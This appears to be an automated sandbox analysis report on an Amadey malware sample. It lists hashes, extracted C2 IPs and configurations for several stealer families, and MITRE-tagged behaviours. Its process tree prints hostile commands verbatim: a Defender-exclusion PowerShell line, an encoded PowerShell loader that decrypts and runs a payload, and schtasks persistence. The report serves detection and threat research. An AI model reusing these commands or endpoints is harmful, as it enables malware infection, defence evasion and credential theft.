amadey | 0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447

Analysis

max time kernel
6s
max time network
94s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
14-05-2024 23:27

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe
Size

1.7MB
MD5

7436868f4ea3111d204d5f5eea08eec5
SHA1

1ffba75eec05fed9564966eeca1cfcb6c5751774
SHA256

0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447
SHA512

04397d86398d7582c07172b38193a97cf4454a660c4af999b9347e23561e2648c36eb3ac98ce948f1239159709cfec991780ab45e88fe48d8e3dc7e36a1ee939
SSDEEP

49152:UsVMbU+osuveQdNoTA4K8eFq+ljjW8uh5qcVBp:TVMbDosuvqTA9Fqr8a5qmp

Score

10^/10

amadey redline risepro stealc zgrat 1 @cloudytteam evasion execution infostealer rat stealer themida trojan

Malware Config

Extracted

Family

amadey

Version

4.20

http://5.42.96.141

http://5.42.96.7

Attributes

install_dir
908f070dff
install_file
explorku.exe
strings_key
b25a9385246248a95c600f9a061438e1
url_paths
/go34ko8/index.php

rc4.plain

Extracted

Family

risepro

147.45.47.126:58709

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

185.172.128.33:8970

Extracted

Family

redline

Botnet

185.215.113.67:26260

Extracted

Family

stealc

http://49.13.229.86

Attributes

url_path
/c73eed764cc59dcb.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3768-149-0x0000000000400000-0x0000000000592000-memory.dmp	family_zgrat_v1
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe	family_zgrat_v1
behavioral2/memory/3132-173-0x0000000000830000-0x00000000008F0000-memory.dmp	family_zgrat_v1
behavioral2/memory/5980-692-0x0000000006B40000-0x0000000006D80000-memory.dmp	family_zgrat_v1

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe	family_redline
behavioral2/memory/3132-173-0x0000000000830000-0x00000000008F0000-memory.dmp	family_redline
behavioral2/memory/1084-172-0x0000000000080000-0x00000000000D2000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe	family_redline
behavioral2/memory/3424-238-0x00000000008D0000-0x0000000000922000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exeexplorku.exeexplorku.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorku.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorku.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

4556 powershell.exe
6140 powershell.exe
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
4556	powershell.exe
6140	powershell.exe

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exeexplorku.exeexplorku.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorku.exe

Executes dropped EXE 2 IoCs

Processes:

explorku.exeexplorku.exe

pid process

4076 explorku.exe
3276 explorku.exe

pid	process
4076	explorku.exe
3276	explorku.exe

Themida packer 46 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/2360-0-0x0000000000DF0000-0x000000000133F000-memory.dmp	themida
behavioral2/memory/2360-2-0x0000000000DF0000-0x000000000133F000-memory.dmp	themida
behavioral2/memory/2360-4-0x0000000000DF0000-0x000000000133F000-memory.dmp	themida
behavioral2/memory/2360-6-0x0000000000DF0000-0x000000000133F000-memory.dmp	themida
behavioral2/memory/2360-7-0x0000000000DF0000-0x000000000133F000-memory.dmp	themida
behavioral2/memory/2360-5-0x0000000000DF0000-0x000000000133F000-memory.dmp	themida
behavioral2/memory/2360-3-0x0000000000DF0000-0x000000000133F000-memory.dmp	themida
behavioral2/memory/2360-1-0x0000000000DF0000-0x000000000133F000-memory.dmp	themida
behavioral2/memory/2360-8-0x0000000000DF0000-0x000000000133F000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe	themida
behavioral2/memory/2360-21-0x0000000000DF0000-0x000000000133F000-memory.dmp	themida
behavioral2/memory/4076-27-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/4076-26-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/4076-24-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/4076-28-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/4076-29-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/4076-25-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/4076-23-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/4076-22-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/4076-30-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/3276-35-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/3276-48-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/3276-50-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/3276-47-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/3276-49-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/3276-46-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/3276-37-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/3276-36-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/3276-34-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/3276-60-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
C:\Users\Admin\1000006002\8d14837a3f.exe	themida
behavioral2/memory/4960-93-0x0000000000E60000-0x00000000014F6000-memory.dmp	themida
behavioral2/memory/4960-94-0x0000000000E60000-0x00000000014F6000-memory.dmp	themida
behavioral2/memory/4960-95-0x0000000000E60000-0x00000000014F6000-memory.dmp	themida
behavioral2/memory/4960-97-0x0000000000E60000-0x00000000014F6000-memory.dmp	themida
behavioral2/memory/4960-100-0x0000000000E60000-0x00000000014F6000-memory.dmp	themida
behavioral2/memory/4960-99-0x0000000000E60000-0x00000000014F6000-memory.dmp	themida
behavioral2/memory/4960-101-0x0000000000E60000-0x00000000014F6000-memory.dmp	themida
behavioral2/memory/4960-98-0x0000000000E60000-0x00000000014F6000-memory.dmp	themida
behavioral2/memory/4960-96-0x0000000000E60000-0x00000000014F6000-memory.dmp	themida
behavioral2/memory/4076-133-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/4960-388-0x0000000000E60000-0x00000000014F6000-memory.dmp	themida
C:\Users\Admin\Pictures\ZfgtA9MyqZJdjBGVmleKlSu4.exe	themida
behavioral2/memory/5096-2745-0x0000000140000000-0x0000000140F7A000-memory.dmp	themida
behavioral2/memory/5220-3570-0x0000000000390000-0x00000000008DF000-memory.dmp	themida
behavioral2/memory/5220-3823-0x0000000000390000-0x00000000008DF000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

explorku.exeexplorku.exe0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorku.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorku.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

24 pastebin.com
27 pastebin.com
32 iplogger.com
61 iplogger.com
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

68 api.myip.com
71 ipinfo.io
79 api.myip.com
82 ipinfo.io
Drops file in Windows directory 1 IoCs

Processes:

0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe

description ioc process

File created C:\Windows\Tasks\explorku.job 0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1096 sc.exe
1820 sc.exe
4264 sc.exe
1172 sc.exe
1340 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
24	pastebin.com
27	pastebin.com
32	iplogger.com
61	iplogger.com

flow	ioc
68	api.myip.com
71	ipinfo.io
79	api.myip.com
82	ipinfo.io

description	ioc	process
File created	C:\Windows\Tasks\explorku.job	0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe

pid	process
1096	sc.exe
1820	sc.exe
4264	sc.exe
1172	sc.exe
1340	sc.exe

Program crash 12 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2216	3504	WerFault.exe	alex.exe
4536	1172	WerFault.exe	dl.exe
4568	1172	WerFault.exe	dl.exe
4896	1172	WerFault.exe	dl.exe
3176	4564	WerFault.exe	toolspub1.exe
3848	1172	WerFault.exe	dl.exe
4568	1172	WerFault.exe	dl.exe
2748	1172	WerFault.exe	dl.exe
4700	1172	WerFault.exe	dl.exe
1200	1172	WerFault.exe	dl.exe
3176	1172	WerFault.exe	dl.exe
5424	1172	WerFault.exe	dl.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

4704 schtasks.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5552 taskkill.exe

pid	process
4704	schtasks.exe

pid	process
5552	taskkill.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exeexplorku.exe

description	pid	process	target process
PID 2360 wrote to memory of 4076	2360	0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe	explorku.exe
PID 2360 wrote to memory of 4076	2360	0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe	explorku.exe
PID 2360 wrote to memory of 4076	2360	0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe	explorku.exe
PID 4076 wrote to memory of 2852	4076	explorku.exe	explorku.exe
PID 4076 wrote to memory of 2852	4076	explorku.exe	explorku.exe
PID 4076 wrote to memory of 2852	4076	explorku.exe	explorku.exe

C:\Users\Admin\AppData\Local\Temp\0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe
"C:\Users\Admin\AppData\Local\Temp\0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2360

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:4076

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
3⤵
PID:2852

C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
3⤵
PID:3856

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
4⤵
PID:3488

C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
5⤵
PID:3504

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:3912

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:3768

C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
7⤵
PID:3132

C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
7⤵
PID:1084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 384
6⤵
- Program crash
PID:2216

C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
5⤵
PID:1744

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:3824

C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
5⤵
PID:3424

C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
"C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
5⤵
PID:1892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
6⤵
PID:4200

C:\Windows\SysWOW64\sc.exe
Sc stop GameServerClient
7⤵
- Launches sc.exe
PID:1096

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameServerClient confirm
7⤵
PID:3284

C:\Windows\SysWOW64\sc.exe
Sc delete GameSyncLink
7⤵
- Launches sc.exe
PID:1820

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameSyncLink confirm
7⤵
PID:4796

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
7⤵
PID:4572

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start GameSyncLink
7⤵
PID:4952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
6⤵
PID:2060

C:\Windows\SysWOW64\sc.exe
Sc stop GameServerClientC
7⤵
- Launches sc.exe
PID:1172

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameServerClientC confirm
7⤵
PID:3352

C:\Windows\SysWOW64\sc.exe
Sc delete PiercingNetLink
7⤵
- Launches sc.exe
PID:4264

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove PiercingNetLink confirm
7⤵
PID:1876

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
7⤵
PID:4660

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start PiercingNetLink
7⤵
PID:4688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
6⤵
PID:4864

C:\Windows\SysWOW64\sc.exe
Sc delete GameSyncLinks
7⤵
- Launches sc.exe
PID:1340

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameSyncLinks confirm
7⤵
PID:5104

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
7⤵
PID:1712

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start GameSyncLinks
7⤵
PID:4108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
6⤵
PID:3852

C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
"C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
5⤵
PID:1148

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:872

C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
"C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
5⤵
PID:2444

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:4844

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
"C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
5⤵
PID:124

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
6⤵
- Creates scheduled task(s)
PID:4704

C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe
"C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe"
6⤵
PID:1172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 476
7⤵
- Program crash
PID:4536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 496
7⤵
- Program crash
PID:4568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 828
7⤵
- Program crash
PID:4896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 836
7⤵
- Program crash
PID:3848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 880
7⤵
- Program crash
PID:4568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 920
7⤵
- Program crash
PID:2748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1048
7⤵
- Program crash
PID:4700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1104
7⤵
- Program crash
PID:1200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1452
7⤵
- Program crash
PID:3176

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "dl.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe" & exit
7⤵
PID:5360

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "dl.exe" /f
8⤵
- Kills process with taskkill
PID:5552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1368
7⤵
- Program crash
PID:5424

C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe"
6⤵
PID:4564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 484
7⤵
- Program crash
PID:3176

C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
"C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
6⤵
PID:2064

C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe"
6⤵
PID:2748

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
7⤵
- Command and Scripting Interpreter: PowerShell
PID:6140

C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
5⤵
PID:1644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABFAEMALAAgADAAeAA2AEYALAAgADAAeAAzADYALAAgADAAeAAwAEUALAAgADAAeAAyAEMALAAgADAAeAA0ADYALAAgADAAeAAwADMALAAgADAAeAA4AEMALAAgADAAeABCADUALAAgADAAeABGAEYALAAgADAAeAAxADAALAAgADAAeABBADUALAAgADAAeAAyADUALAAgADAAeAA4AEIALAAgADAAeAAxAEIALAAgADAAeAA3ADkALAAgADAAeABCAEMALAAgADAAeABBADUALAAgADAAeAAzADkALAAgADAAeAA0ADgALAAgADAAeABFADIALAAgADAAeAA2ADIALAAgADAAeAA4ADUALAAgADAAeAAyADgALAAgADAAeAAzADcALAAgADAAeABCAEYALAAgADAAeAA0ADEALAAgADAAeABBAEQALAAgADAAeAAxADgALAAgADAAeAAxADYALAAgADAAeAA5AEMALAAgADAAeAAwAEQAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADUARgAsACAAMAB4AEYAQwAsACAAMAB4ADgAQwAsACAAMAB4ADcAQwAsACAAMAB4ADMAOQAsACAAMAB4ADcANQAsACAAMAB4ADAAOQAsACAAMAB4AEYAQwAsACAAMAB4AEIAOQAsACAAMAB4ADcAMQAsACAAMAB4AEYAQwAsACAAMAB4AEUAQgAsACAAMAB4ADQAQQAsACAAMAB4AEUARQAsACAAMAB4AEIARgAsACAAMAB4ADcANgApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
6⤵
- Command and Scripting Interpreter: PowerShell
PID:4556

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
7⤵
PID:5308

C:\Users\Admin\Pictures\ru8BcQeEBRBK8K8ZzmJJeN27.exe
"C:\Users\Admin\Pictures\ru8BcQeEBRBK8K8ZzmJJeN27.exe"
8⤵
PID:5756

C:\Users\Admin\Pictures\Y65sslsieSOUgznpy9JrHpmv.exe
"C:\Users\Admin\Pictures\Y65sslsieSOUgznpy9JrHpmv.exe"
8⤵
PID:5832

C:\Users\Admin\Pictures\N3YrmUh5Ab7zF6CaFgJPUhG1.exe
"C:\Users\Admin\Pictures\N3YrmUh5Ab7zF6CaFgJPUhG1.exe" /s
8⤵
PID:6016

